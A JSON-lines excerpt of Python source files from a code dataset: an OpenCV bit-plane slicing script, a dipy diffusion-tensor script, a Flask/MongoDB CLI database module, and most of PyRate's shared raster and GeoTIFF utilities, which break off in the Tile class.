{"seq_id":"195759390","text":"\n\nimport cv2\nimport copy\nimport numpy as np \nfrom matplotlib import pyplot as plt\n\nimageName = 'blue'\ngrayImage = cv2.imread(imageName+'.jpg',0)\n#grayImage = cv2.cvtColor(grayImage, cv2.COLOR_BGR2GRAY)\n\nbinaries = [0b00000001,0b00000010,0b00000100,0b00001000,0b00010000,\n            0b00100000,0b01000000,0b10000000]\n\nprint(binaries)\n\norgImage = copy.copy(grayImage)\n\nbit = 7\n\ncompImage = np.zeros((grayImage.shape[0],grayImage.shape[1]))\n\nwhile bit>=0:\n    \n    grayImage=copy.copy(orgImage)\n    imgpos = 0\n    grayImage=cv2.bitwise_and(grayImage,binaries[bit])\n    cv2.imwrite(imageName+str(bit)+'bitSlice.jpg',grayImage)\n    imgpos=imgpos+1\n    if(bit>=4):\n        compImage = compImage + grayImage\n    bit=bit-1\n    \ncv2.imwrite(imageName+\"comp\"+'.jpg',compImage)","sub_path":"Compression/compress.py","file_name":"compress.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"286838615","text":"from dipy.io.gradients import read_bvals_bvecs\nfrom dipy.core.gradients import gradient_table\nimport nibabel as nib\nimport numpy as np\nimport dipy.reconst.dti as dti\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n\ndef load_nifti(file_name_with_extension):\n    directory = os.path.dirname(os.path.realpath(__file__))\n    file_name = directory + '\\\\tp3_data\\\\' + file_name_with_extension\n    image = nib.load(file_name)\n    return image\n\n# loading image and gradient table\nbvals_filename=\"tp3_data\\\\bvals2000\"\nbvecs_filename=\"tp3_data\\\\bvecs2000\"\ndtipeaks_filename = \"tp3_data\\\\_peaks\"\ntensor_filename = \"tp3_data\\\\_tensor\"\nimg_filename = \"dwi2000.nii.gz\"\n\nbvals, bvecs = read_bvals_bvecs(bvals_filename, bvecs_filename)\ngtab = gradient_table(bvals, bvecs)\nimg = load_nifti(img_filename)\n\n##### use a mask for the tensor computation\ntenmodel = dti.TensorModel(gtab)\nbrain_mask = nib.load(\"tp3_data\\\\_mask.nii.gz\").get_data()\ntenfit = tenmodel.fit(img.get_data(), mask=brain_mask)\n\n##### save the principal orientations\npeaks_fiberNav = np.zeros((112, 112, 60, 15), dtype='float32')\npeaks_fiberNav[:, :, :, 0:3] = tenfit.evecs[..., 
0].astype(np.float32)\nnib.save(nib.Nifti1Image(peaks_fiberNav, img.get_affine()), dtipeaks_filename)\n\n##### save the tensors\nfrom dipy.reconst.dti import lower_triangular\ntensor_vals = lower_triangular(tenfit.quadratic_form)\ncorrect_order = [0, 1, 3, 2, 4, 5]\ntensor_vals_reordered = tensor_vals[..., correct_order]\nfiber_tensors = nib.Nifti1Image(tensor_vals_reordered.astype(np.float32), img.get_affine())\nnib.save(fiber_tensors, tensor_filename)\n\n##### display a coronal slice\ntenseurs = load_nifti(\"_tensor.nii\").get_data()\norientation = load_nifti(\"_peaks.nii\").get_data()\n\nfig = plt.figure()\nfig.add_subplot(121)\nplt.title(\"Tenseurs\")\nplt.axis('off')\nplt.imshow(tenseurs[:, tenseurs.shape[1]/2, :, 0], cmap=cm.gray)\nfig.add_subplot(122)\nplt.title(\"Orientations Principales\")\nplt.axis('off')\nplt.imshow(orientation[:, orientation.shape[1]/2, :, 0], cmap=cm.gray)\n\nplt.savefig(os.path.dirname(os.path.realpath(__file__)) + \"\\\\..\" + \"\\\\Latex\\\\Images\\\\Tenseurs_orientation.png\")\nplt.show()\n\n","sub_path":"Scripts/tenseurs.py","file_name":"tenseurs.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"303830089","text":"import sqlite3\nfrom flask import Flask\nfrom flask_pymongo import PyMongo\nimport click\n# g is a namespace object that can store data during an application context\n# read: https://flask.palletsprojects.com/en/1.1.x/appcontext/\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\nfrom core import mongo_db\nfrom core.algorithm.SentimentAnalysis import SentimentAnalysis\nfrom core.algorithm.CompressedTrie import CompressedTrie\nfrom core.algorithm.DTW import AudioAnalysis\n\n\ndef init_app(app: Flask):\n    \"\"\"Initialize app for registering functions\"\"\"\n    # call that function when cleaning up after returning the response\n    # app.teardown_appcontext(close_db)\n    # new command that can be called with the flask command\n    app.cli.add_command(init_db_command)\n    app.cli.add_command(generate_compressed_trie)\n    app.cli.add_command(run_audio_analysis)\n    \n\n\ndef get_db():\n    if 'db' not in g:\n        # mongo = PyMongo(current_app)\n        # g.db = mongo.db\n        g.db = mongo_db\n\n    # return the connection of db which is stored in g\n    return g.db\n\n\ndef close_db(e=None):\n    db = g.pop('db', None)\n\n    if db is not None:\n        db.close()\n\n\ndef init_db():\n    \"\"\"Initialize database\"\"\"\n    db = get_db()\n    # insert some data\n    data_list = SentimentAnalysis.retrieve_all()\n    db.analysis.remove({})\n    for data in data_list:\n        filter = {\n            \"courier\":data['courier'],\n            \"url\":data['url']\n        }\n        db.analysis.update_one(filter=filter, update={\"$set\":data}, upsert=True)\n\n\n\n@click.command('init-db')\n# https://click.palletsprojects.com/en/7.x/api/#click.command\n# defines a command line command called init-db that calls the init_db function\n@with_appcontext\n# https://flask.palletsprojects.com/en/1.1.x/api/#flask.cli.with_appcontext\n# guaranteed to be executed with the script’s application context\ndef init_db_command():\n    \"\"\"Clear the existing data and create new tables.\"\"\"\n    init_db()\n    click.echo('Initialized the database.')\n\n@click.command('gen-compressed-trie')\n@with_appcontext\ndef generate_compressed_trie():\n    \"\"\"Regenerate compressed trie for string matching\"\"\"\n    ct = CompressedTrie()\n    ct.run_generate_compressed_trie()\n    click.echo('Generated compressed 
trie')\n\n@click.command('run-audio-analysis')\n@with_appcontext\ndef run_audio_analysis():\n \"\"\"Rerun audio analysis using DTW\"\"\"\n tr = AudioAnalysis()\n tr.run_audio_analysis()\n click.echo('Performed DTW audio analysis')","sub_path":"core/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"55704034","text":"# This Python module is part of the PyRate software package.\n#\n# Copyright 2017 Geoscience Australia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"\nThis Python module contains utilities and classes shared by\nall other PyRate modules.\n\"\"\"\n# pylint: disable=too-many-lines\nfrom __future__ import print_function\nimport errno\nimport logging\nimport math\nfrom math import floor\nimport os\nfrom os.path import basename, dirname, join\nimport shutil\nimport stat\nimport struct\nfrom datetime import date\nfrom itertools import product\nimport numpy as np\nfrom numpy import where, nan, isnan, sum as nsum, isclose\nimport pyproj\nimport pkg_resources\n\nfrom pyrate import ifgconstants as ifc, mpiops\nfrom pyrate import roipac, gamma, config as cf\n\nVERBOSE = True\nlog = logging.getLogger(__name__)\n\ntry:\n from osgeo import osr, gdal\n from osgeo.gdalconst import GA_Update, GA_ReadOnly\nexcept ImportError:\n import gdal\n\ngdal.UseExceptions()\n\n# Constants\nPHASE_BAND = 1\nRADIANS = 'RADIANS'\nMILLIMETRES = 'MILLIMETRES'\nGAMMA = 'GAMMA'\nROIPAC = 'ROIPAC'\n\n# GDAL projection list\nGDAL_X_CELLSIZE = 1\nGDAL_Y_CELLSIZE = 5\nGDAL_X_FIRST = 0\nGDAL_Y_FIRST = 3\n\n\ndef mkdir_p(path):\n \"\"\"\n Copied from stackoverflow.\n \"\"\"\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n\nclass RasterBase(object):\n \"\"\"\n Base class for PyRate GeoTIFF based raster datasets.\n \"\"\"\n # pylint: disable=missing-docstring\n # pylint: disable=too-many-instance-attributes\n def __init__(self, path):\n if isinstance(path, gdal.Dataset):\n self.dataset = path # path will be Dataset in this case\n self.data_path = self.dataset # data_path dummy\n self.add_geographic_data()\n else:\n self.data_path = path\n self.dataset = None # for GDAL dataset obj\n self._readonly = not os.access(path, os.R_OK | os.W_OK)\n\n if self._readonly is None:\n raise NotImplementedError # os.access() has failed?\n\n def __str__(self):\n name = self.__class__.__name__\n return \"%s('%s')\" % (name, self.data_path)\n\n def __repr__(self):\n name = self.__class__.__name__\n return \"%s('%s')\" % (name, self.data_path)\n\n def open(self, readonly=None):\n \"\"\"\n Opens generic raster dataset.\n \n :param readonly: True/False, or None to open as underlying file setting \n \"\"\"\n if self.dataset is not None:\n msg = \"open() already called for %s\" % self\n raise RasterException(msg)\n\n if not os.path.exists(self.data_path):\n raise IOError('The file {path} does not exist. 
Consider running '\n                          'prepifg'.format(path=self.data_path))\n\n        # unless read only, by default open files as writeable\n        if readonly not in [True, False, None]:\n            raise ValueError(\"readonly must be True, False or None\")\n\n        if readonly is False and self._readonly is True:\n            raise IOError(\"Cannot open write protected file for writing\")\n\n        flag = GA_ReadOnly if self._readonly else GA_Update\n        self.dataset = gdal.Open(self.data_path, flag)\n        if self.dataset is None:\n            raise RasterException(\"Error opening %s\" % self.data_path)\n\n        self.add_geographic_data()\n\n    def add_geographic_data(self):\n        \"\"\"\n        Add geographic data (centre coordinates and cell sizes) to the raster.\n        \"\"\"\n        # add some geographic data\n        self.x_centre = int(self.ncols / 2)\n        self.y_centre = int(self.nrows / 2)\n        self.lat_centre = self.y_first + (self.y_step * self.y_centre)\n        self.long_centre = self.x_first + (self.x_step * self.x_centre)\n        # use cell size from centre of scene\n        self.x_size, self.y_size = cell_size(self.lat_centre, self.long_centre,\n                                             self.x_step, self.y_step)\n\n    @property\n    def ncols(self):\n        \"\"\"\n        Number of columns in the raster.\n        \"\"\"\n        return self.dataset.RasterXSize\n\n    @property\n    def nrows(self):\n        \"\"\"\n        Number of rows in the raster.\n        \"\"\"\n        return self.dataset.RasterYSize\n\n    @property\n    def x_step(self):\n        \"\"\"\n        Cell size in the x direction.\n        \"\"\"\n        return float(self.dataset.GetGeoTransform()[GDAL_X_CELLSIZE])\n\n    @property\n    def y_step(self):\n        \"\"\"\n        Cell size in the y direction.\n        \"\"\"\n        return float(self.dataset.GetGeoTransform()[GDAL_Y_CELLSIZE])\n\n    @property\n    def x_first(self):\n        \"\"\"\n        x coordinate of the first (westernmost) column.\n        \"\"\"\n        return float(self.dataset.GetGeoTransform()[GDAL_X_FIRST])\n\n    @property\n    def x_last(self):\n        \"\"\"\n        x coordinate one cell past the last (easternmost) column.\n        \"\"\"\n        return self.x_first + (self.x_step * self.ncols)\n\n    @property\n    def y_first(self):\n        \"\"\"\n        y coordinate of the first (topmost) row.\n        \"\"\"\n        return float(self.dataset.GetGeoTransform()[GDAL_Y_FIRST])\n\n    @property\n    def y_last(self):\n        \"\"\"\n        y coordinate one cell past the last (bottommost) row.\n        \"\"\"\n        return self.y_first + (self.y_step * self.nrows)\n\n    @property\n    def shape(self):\n        \"\"\"\n        Returns tuple of (Y,X) shape of the raster (as per numpy.shape).\n        \"\"\"\n        return self.dataset.RasterYSize, self.dataset.RasterXSize\n\n    @property\n    def num_cells(self):\n        \"\"\"\n        Total number of cells in the raster.\n        \"\"\"\n        if self.is_open:\n            return self.dataset.RasterXSize * self.dataset.RasterYSize\n        else:\n            raise RasterException('Dataset not open')\n\n    @property\n    def is_open(self):\n        \"\"\"\n        Returns True if the underlying dataset has been opened by GDAL.\n        \"\"\"\n        return self.dataset is not None\n\n    def close(self):\n        \"\"\"\n        Explicitly closes file opened by gdal.Open()\n        This is required in Windows, otherwise opened files can not be removed,\n        because Windows locks opened files.\n        \"\"\"\n        if self.is_open:\n            self.dataset = None\n\n    @property\n    def is_read_only(self):\n        \"\"\"\n        Returns True if the raster is read-only.\n        \"\"\"\n        return self._readonly\n\n    def _get_band(self, band):\n        \"\"\"\n        Wrapper (with error checking) for GDAL's Band.GetRasterBand() method.\n        \n        :param band: number of band, starting at 1\n        \"\"\"\n\n        if self.dataset is not None:\n            return self.dataset.GetRasterBand(band)\n        else:\n            raise RasterException(\"Raster %s has not been opened\"\n                                  % self.data_path)\n\n\nclass Ifg(RasterBase):\n    \"\"\"\n    Interferogram class, represents the difference between two acquisitions.\n    Ifg objects double as a container for related data.\n    \"\"\"\n    # pylint: disable=too-many-instance-attributes\n    def __init__(self, path):\n        \"\"\"\n        Interferogram constructor, for 2 band ROI_PAC interferogram raster datasets.\n        \n        :param path: Path to interferogram\n        \"\"\"\n\n        RasterBase.__init__(self, path)\n        self._phase_band = None\n        
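# --- Added example (editor's sketch; not part of the original module) ---
# Ifg.convert_to_nans below replaces cells that match the no-data value with
# NaN via an approximate comparison. The core operation in isolation:
import numpy as np

phase = np.array([[0.0, 1.5], [0.0, -2.0]], dtype=np.float32)
nodata_value = 0.0
converted = np.where(np.isclose(phase, nodata_value, atol=1e-6), np.nan, phase)
# `converted` now holds NaN wherever `phase` was (approximately) the no-data value.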
self._phase_data = None\n self.master = None\n self.slave = None\n self.nan_converted = False\n self.mm_converted = False\n self.meta_data = None\n self.wavelength = None\n self._nodata_value = None\n self.time_span = None\n\n def open(self, readonly=None):\n \"\"\"\n Opens generic raster dataset.\n \n :param readonly: True/False, or None to open as underlying file setting\n \"\"\"\n RasterBase.open(self, readonly)\n self.initialize()\n\n def initialize(self):\n \"\"\"\n Basic interferogram properties read on opening interferogram.\n \"\"\"\n self._init_dates()\n md = self.dataset.GetMetadata()\n self.wavelength = float(md[ifc.PYRATE_WAVELENGTH_METRES])\n self.meta_data = md\n # creating code needs to set this flag after 0 -> NaN replacement\n self.nan_converted = False\n\n def _init_dates(self):\n \"\"\"\n Grab master and slave date from metadata.\n \"\"\"\n def _to_date(datestr):\n year, month, day = [int(i) for i in datestr.split('-')]\n return date(year, month, day)\n\n md = self.dataset.GetMetadata()\n datestrs = [md[k] for k in [ifc.MASTER_DATE, ifc.SLAVE_DATE]]\n\n if all(datestrs):\n self.master, self.slave = [_to_date(s) for s in datestrs]\n self.time_span = (self.slave - self.master).days/ifc.DAYS_PER_YEAR\n else:\n msg = 'Missing master and/or slave date in %s' % self.data_path\n raise IfgException(msg)\n\n def convert_to_nans(self):\n \"\"\"\n Converts given values in phase data to NaNs.\n \n :param val: value to convert, default is 0\n \"\"\"\n if (self._nodata_value is None) \\\n or (self.dataset is None): # pragma: no cover\n msg = 'nodata value needs to be set for nan conversion.' \\\n 'Use ifg.nodata_value = NoDataValue to set nodata_value'\n log.warning(msg)\n raise RasterException(msg)\n if ((self.dataset.GetMetadataItem(ifc.NAN_STATUS) == ifc.NAN_CONVERTED)\n or self.nan_converted):\n self.phase_data = self.phase_data\n self.nan_converted = True\n msg = '{}: ignored as previous nan ' \\\n 'conversion detected'.format(self.data_path)\n log.debug(msg)\n return\n else:\n self.phase_data = where(\n isclose(self.phase_data, self._nodata_value, atol=1e-6),\n nan,\n self.phase_data)\n self.meta_data[ifc.NAN_STATUS] = ifc.NAN_CONVERTED\n self.nan_converted = True\n\n @property\n def phase_band(self):\n \"\"\"\n Returns a GDAL Band object for the phase band.\n \"\"\"\n\n if self._phase_band is None:\n self._phase_band = self._get_band(PHASE_BAND)\n return self._phase_band\n\n @property\n def nodata_value(self):\n \"\"\"\n Returns a GDAL Band object for the phase band.\n \"\"\"\n return self._nodata_value\n\n @nodata_value.setter\n def nodata_value(self, val):\n \"\"\"\n xxxx\n \n :param val: xxxx\n \"\"\"\n\n self._nodata_value = val\n\n @property\n def phase_data(self):\n \"\"\"\n Returns entire phase band as an array.\n \"\"\"\n\n if self._phase_data is None:\n self._phase_data = self.phase_band.ReadAsArray()\n return self._phase_data\n\n def convert_to_mm(self):\n \"\"\"\n Convert wavelength from radians to mm.\n \n :param ifg: ifg file\n \"\"\"\n self.mm_converted = True\n if self.dataset.GetMetadataItem(ifc.DATA_UNITS) == MILLIMETRES:\n msg = '{}: ignored as previous phase unit conversion ' \\\n 'already applied'.format(self.data_path)\n log.debug(msg)\n self.phase_data = self.phase_data\n return\n elif self.dataset.GetMetadataItem(ifc.DATA_UNITS) == RADIANS:\n self.phase_data = convert_radians_to_mm(self.phase_data,\n self.wavelength)\n self.meta_data[ifc.DATA_UNITS] = MILLIMETRES\n # self.write_modified_phase()\n # otherwise NaN's don't write to bytecode properly\n # and 
numpy complains\n # self.dataset.FlushCache()\n msg = '{}: converted phase units ' \\\n 'to millimetres'.format(self.data_path)\n log.debug(msg)\n else: # pragma: no cover\n msg = 'Phase units are not millimetres or radians'\n raise IfgException(msg)\n\n @phase_data.setter\n def phase_data(self, data):\n \"\"\"\n xxxx\n\n :param data: xxxx\n \"\"\"\n self._phase_data = data\n\n @property\n def phase_rows(self):\n \"\"\"\n Generator returning each row of the phase data.\n \"\"\"\n\n for y in range(self.nrows):\n r = self.phase_band.ReadAsArray(yoff=y,\n win_xsize=self.ncols, win_ysize=1)\n yield r[0] # squeezes row from (1, WIDTH) to 1D array\n\n @property\n def nan_count(self):\n \"\"\"\n Returns number of NaN cells in the phase data.\n \"\"\"\n return nsum(isnan(self.phase_data))\n\n @property\n def nan_fraction(self):\n \"\"\"\n Returns 0-1 (float) proportion of NaN cells for the phase band.\n \"\"\"\n if (self._nodata_value is None) or (self.dataset is None):\n msg = 'nodata_value needs to be set for nan fraction calc.' \\\n 'Use ifg.nondata = NoDataValue to set nodata'\n raise RasterException(msg)\n # don't cache nan_count as client code may modify phase data\n nan_count = self.nan_count\n # handle datasets with no 0 -> NaN replacement\n if not self.nan_converted and (nan_count == 0):\n nan_count = nsum(np.isclose(self.phase_data,\n self._nodata_value, atol=1e-6))\n return nan_count / float(self.num_cells)\n\n def write_modified_phase(self, data=None):\n \"\"\"\n Writes phase data to disk.\n For this to work, a copy of the original file\n \n :param data: xxxx\n \"\"\"\n\n if self.is_read_only:\n raise IOError(\"Cannot write to read only Ifg\")\n\n # keep this block\n # if new_data_path is None:\n # self.dataset = gdal.Open(self.data_path, GA_Update)\n # else:\n # self.dataset = gdal.Open(new_data_path, GA_Update)\n # self._phase_band = None\n\n if data is not None:\n assert isinstance(data, np.ndarray)\n data_r, data_c = data.shape\n assert data_r == self.nrows and data_c == self.ncols\n self.phase_data = data\n self.phase_band.WriteArray(self.phase_data)\n for k, v in self.meta_data.items():\n self.dataset.SetMetadataItem(k, v)\n self.dataset.FlushCache()\n\n def save_numpy_phase(self, numpy_file):\n \"\"\"\n Save phase data.\n \n :param numpy_file: File path where phase data is saved\n \"\"\"\n np.save(file=numpy_file, arr=self.phase_data)\n\n\nclass IfgPart(object):\n \"\"\"\n Slice of Ifg data object.\n \"\"\"\n # pylint: disable=missing-docstring\n # pylint: disable=too-many-instance-attributes\n def __init__(self, ifg_or_path, tile, ifg_dict=None):\n\n self.tile = tile\n self.r_start = self.tile.top_left_y\n self.r_end = self.tile.bottom_right_y\n self.c_start = self.tile.top_left_x\n self.c_end = self.tile.bottom_right_x\n # TODO: fix this if cond\n if ifg_dict is not None: # should be used with MPI\n ifg = ifg_dict[ifg_or_path]\n self.nan_fraction = ifg.nan_fraction\n self.master = ifg.master\n self.slave = ifg.slave\n self.time_span = ifg.time_span\n phase_file = 'phase_data_{}_{}.npy'.format(\n basename(ifg_or_path).split('.')[0], tile.index)\n self.phase_data = np.load(join(dirname(ifg_or_path), cf.TMPDIR,\n phase_file))\n else:\n # check if Ifg was sent.\n if isinstance(ifg_or_path, Ifg):\n ifg = ifg_or_path\n else:\n self.data_path = ifg_or_path\n ifg = Ifg(ifg_or_path)\n self.phase_data = None\n self.nan_fraction = None\n self.master = None\n self.slave = None\n self.time_span = None\n if isinstance(ifg, Ifg):\n self.read_required(ifg)\n\n def read_required(self, ifg):\n 
\"\"\"\n xxxx\n \n :param ifg: xxxx \n \"\"\"\n if not ifg.is_open:\n ifg.open(readonly=True)\n ifg.nodata_value = 0\n self.phase_data = ifg.phase_data[self.r_start:self.r_end,\n self.c_start:self.c_end]\n self.nan_fraction = ifg.nan_fraction\n self.master = ifg.master\n self.slave = ifg.slave\n self.time_span = ifg.time_span\n ifg.phase_data = None\n ifg.close() # close base ifg\n\n @property\n def nrows(self):\n \"\"\"\n xxxx\n \"\"\"\n return self.r_end - self.r_start\n\n @property\n def ncols(self):\n \"\"\"\n xxxx\n \"\"\"\n return self.c_end - self.c_start\n\n\nclass Incidence(RasterBase): # pragma: no cover\n \"\"\"Incidence class.\"\"\"\n\n def __init__(self, path):\n \"\"\"\n Incidence obj constructor.\n \"\"\"\n\n RasterBase.__init__(self, path)\n self._incidence_band = None\n self._azimuth_band = None\n self._incidence_data = None\n self._azimuth_data = None\n\n @property\n def incidence_band(self):\n \"\"\"\n Returns the GDALBand for the incidence angle layer.\n \"\"\"\n\n if self._incidence_band is None:\n self._incidence_band = self._get_band(1)\n return self._incidence_band\n\n @property\n def incidence_data(self):\n \"\"\"\n Returns the entire incidence band as an array.\n \"\"\"\n\n if self._incidence_data is None:\n self._incidence_data = self.incidence_band.ReadAsArray()\n return self._incidence_data\n\n @property\n def azimuth_band(self):\n \"\"\"\n Returns the GDALBand for the azimuth layer.\n \"\"\"\n\n if self._azimuth_band is None:\n self._azimuth_band = self._get_band(2)\n return self._azimuth_band\n\n @property\n def azimuth_data(self):\n \"\"\"\n Returns the entire incidence band as an array.\n \"\"\"\n\n if self._azimuth_data is None:\n self._azimuth_data = self.azimuth_band.ReadAsArray()\n return self._azimuth_data\n\n\nclass DEM(RasterBase):\n \"\"\"\n Generic raster class for ROI_PAC single band DEM files.\n \"\"\"\n\n def __init__(self, path):\n \"\"\"\n DEM constructor.\n \"\"\"\n RasterBase.__init__(self, path)\n self._band = None\n\n @property\n def height_band(self):\n \"\"\"\n Returns the GDALBand for the elevation layer.\n \"\"\"\n\n if self._band is None:\n self._band = self._get_band(1)\n return self._band\n\n\nclass IfgException(Exception):\n \"\"\"\n Generic exception class for interferogram errors.\n \"\"\"\n\n\nclass RasterException(Exception):\n \"\"\"\n Generic exception for raster errors.\n \"\"\"\n\n\nclass EpochList(object):\n \"\"\"\n Metadata container for epoch related information.\n \"\"\"\n\n def __init__(self, dates=None, repeat=None, spans=None):\n self.dates = dates # list of unique dates from all the ifgs\n self.repeat = repeat\n self.spans = spans # time span from earliest ifg\n\n def __str__(self):\n return \"EpochList: %s\" % str(self.dates)\n\n def __repr__(self):\n return \"EpochList: %s\" % repr(self.dates)\n\n\ndef convert_radians_to_mm(data, wavelength):\n \"\"\"\n Translates phase from radians to millimetres.\n \n :param data: Interferogram phase data\n :param wavelength: Radar wavelength; normally included with SAR instrument metadata\n \n :return xxxx\n \"\"\"\n return data * ifc.MM_PER_METRE * (wavelength / (4 * math.pi))\n\n\ndef nanmedian(x):\n \"\"\"\n xxxx \n \n :param x: xxxx\n :return xxxx\n \"\"\"\n # pylint: disable=no-member\n version = [int(i) for i in\n pkg_resources.get_distribution(\"numpy\").version.split('.')]\n if version[0] == 1 and version[1] > 9:\n return np.nanmedian(x)\n else: # pragma: no cover\n return np.median(x[~np.isnan(x)])\n\n\ndef write_geotiff(header, data_path, dest, nodata):\n # pylint: 
disable=too-many-statements\n \"\"\"\n Writes input image data (interferograms, DEM, incidence maps etc)\n to GeoTIFF format with PyRate metadata.\n \n :param header: xxxx\n :param data_path: xxxx\n :param dest: xxxx\n :param nodata: xxxx\n \n :return xxxx\n \"\"\"\n # pylint: disable=too-many-branches\n # pylint: disable=too-many-locals\n is_ifg = ifc.PYRATE_WAVELENGTH_METRES in header\n is_incidence = 'FILE_TYPE' in header\n ifg_proc = header[ifc.PYRATE_INSAR_PROCESSOR]\n ncols = header[ifc.PYRATE_NCOLS]\n nrows = header[ifc.PYRATE_NROWS]\n\n # need to have gamma/roipac functionality here?\n if ifg_proc == ROIPAC:\n roipac.check_raw_data(is_ifg, data_path, ncols, nrows)\n roipac.check_step_mismatch(header)\n else: # GAMMA\n gamma.check_raw_data(data_path, ncols, nrows)\n gamma.check_step_mismatch(header)\n\n driver = gdal.GetDriverByName(\"GTiff\")\n dtype = gdal.GDT_Float32 if (is_ifg or is_incidence) else gdal.GDT_Int16\n ds = driver.Create(dest, ncols, nrows, 1, dtype)\n\n # write pyrate parameters to headers\n if is_ifg:\n for k in [ifc.PYRATE_WAVELENGTH_METRES, ifc.PYRATE_TIME_SPAN,\n ifc.PYRATE_INSAR_PROCESSOR,\n ifc.MASTER_DATE, ifc.SLAVE_DATE,\n ifc.DATA_UNITS, ifc.DATA_TYPE]:\n ds.SetMetadataItem(k, str(header[k]))\n if ifg_proc == GAMMA:\n for k in [ifc.MASTER_TIME, ifc.SLAVE_TIME, ifc.PYRATE_INCIDENCE_DEGREES]:\n ds.SetMetadataItem(k, str(header[k]))\n elif is_incidence:\n ds.SetMetadataItem(ifc.DATA_TYPE, ifc.INCIDENCE)\n else: # must be dem\n ds.SetMetadataItem(ifc.DATA_TYPE, ifc.DEM)\n\n # position and projection data\n ds.SetGeoTransform([header[ifc.PYRATE_LONG], header[ifc.PYRATE_X_STEP], 0,\n header[ifc.PYRATE_LAT], 0, header[ifc.PYRATE_Y_STEP]])\n\n srs = osr.SpatialReference()\n res = srs.SetWellKnownGeogCS(header[ifc.PYRATE_DATUM])\n\n if res:\n msg = 'Unrecognised projection: %s' % header[ifc.PYRATE_DATUM]\n raise GeotiffException(msg)\n\n ds.SetProjection(srs.ExportToWkt())\n\n # copy data from the binary file\n band = ds.GetRasterBand(1)\n band.SetNoDataValue(nodata)\n\n if ifg_proc == GAMMA:\n fmtstr = '!' + ('f' * ncols) # data format is big endian float32s\n bytes_per_col = 4\n elif ifg_proc == ROIPAC:\n if is_ifg:\n fmtstr = '<' + ('f' * ncols) # roipac ifgs are little endian float32s\n bytes_per_col = 4\n else:\n fmtstr = '<' + ('h' * ncols) # roipac DEM is little endian signed int16\n bytes_per_col = 2\n else: # pragma: no cover\n msg = 'Unrecognised InSAR Processor: %s' % ifg_proc\n raise GeotiffException(msg)\n\n row_bytes = ncols * bytes_per_col\n\n with open(data_path, 'rb') as f:\n for y in range(nrows):\n if ifg_proc == ROIPAC:\n if is_ifg:\n f.seek(row_bytes, 1) # skip interleaved band 1\n\n data = struct.unpack(fmtstr, f.read(row_bytes))\n #else: # GAMMA\n # data = struct.unpack(fmtstr, f.read(ncols * 4))\n\n band.WriteArray(np.array(data).reshape(1, ncols), yoff=y)\n\n # Needed? Only in ROIPAC code\n ds = None # manual close\n del ds\n\n\ndef write_unw_from_data_or_geotiff(geotif_or_data, dest_unw, ifg_proc):\n \"\"\"\n xxxx\n \n :param geotif_or_data: Data or geotiff to covert into unwrapped\n :param dest_unw: Destination unwrapped file\n :param ifg_proc: Processor type, GAMMA=1, ROIPAC=0\n \n :return xxxx\n \"\"\"\n if ifg_proc != 1:\n raise NotImplementedError('only support gamma processor for now')\n if isinstance(geotif_or_data, str):\n assert os.path.exists(geotif_or_data), 'make sure geotif exists'\n ds = gdal.Open(geotif_or_data)\n data = ds.ReadAsArray()\n ds = None\n else:\n data = geotif_or_data\n\n nrows, ncols = data.shape\n fmtstr = '!' 
+ ('f' * ncols) # data format is big endian float32s\n\n with open(dest_unw, 'wb') as f:\n for y in range(nrows):\n col_data = struct.pack(fmtstr, *data[y, :])\n f.write(col_data)\n\n\ndef write_output_geotiff(md, gt, wkt, data, dest, nodata):\n # pylint: disable=too-many-arguments\n \"\"\"\n Writes PyRate output data to a GeoTIFF file.\n \n :param md: Dictionary containing PyRate metadata\n :param gt: GDAL geotransform for the data\n :param wkt: GDAL projection information for the data\n :param data: xxxx\n :param dest: xxxx\n :param nodata: xxxx\n \n :return xxxx\n \"\"\"\n\n driver = gdal.GetDriverByName(\"GTiff\")\n nrows, ncols = data.shape\n ds = driver.Create(dest, ncols, nrows, 1, gdal.GDT_Float32)\n # set spatial reference for geotiff\n ds.SetGeoTransform(gt)\n ds.SetProjection(wkt)\n ds.SetMetadataItem(ifc.EPOCH_DATE, str(md[ifc.EPOCH_DATE]))\n\n # set other metadata\n ds.SetMetadataItem('DATA_TYPE', str(md['DATA_TYPE']))\n # sequence position for time series products\n if 'SEQUENCE_POSITION' in md:\n ds.SetMetadataItem('SEQUENCE_POSITION', str(md['SEQUENCE_POSITION']))\n\n # write data to geotiff\n band = ds.GetRasterBand(1)\n band.SetNoDataValue(nodata)\n band.WriteArray(data, 0, 0)\n\n\nclass GeotiffException(Exception):\n \"\"\"\n Geotiff exception class.\n \"\"\"\n\n\ndef create_tiles(shape, nrows=2, ncols=2):\n \"\"\"\n Shape must be a 2-tuple, i.e., 2d_array.shape.\n The returned list contains nrowsXncols Tiles with each tile preserving the\n \"physical\" layout of original array.\n\n The number of rows can be changed (increased) such that the resulting tiles\n with float32's do not exceed 500MB in memory.\n\n When the array shape (rows, columns) are not divisible by (nrows, ncols) then\n some of the array dimensions can change according to numpy.array_split.\n\n :param shape: Shape tuple of interferogram\n :param nrows: Number of rows of tiles\n :param ncols: Number of columns of tiles\n\n :return List of Tile class instances.\n \"\"\"\n\n if len(shape) != 2:\n raise ValueError('shape must be a length 2 tuple')\n\n no_y, no_x = shape\n\n if ncols > no_x or nrows > no_y:\n raise ValueError('nrows/cols must be greater than ifg dimensions')\n col_arr = np.array_split(range(no_x), ncols)\n row_arr = np.array_split(range(no_y), nrows)\n return [Tile(i, (r[0], c[0]), (r[-1]+1, c[-1]+1))\n for i, (r, c) in enumerate(product(row_arr, col_arr))]\n\n\nclass Tile:\n \"\"\"\n Tile class containing part of the interferograms.\n 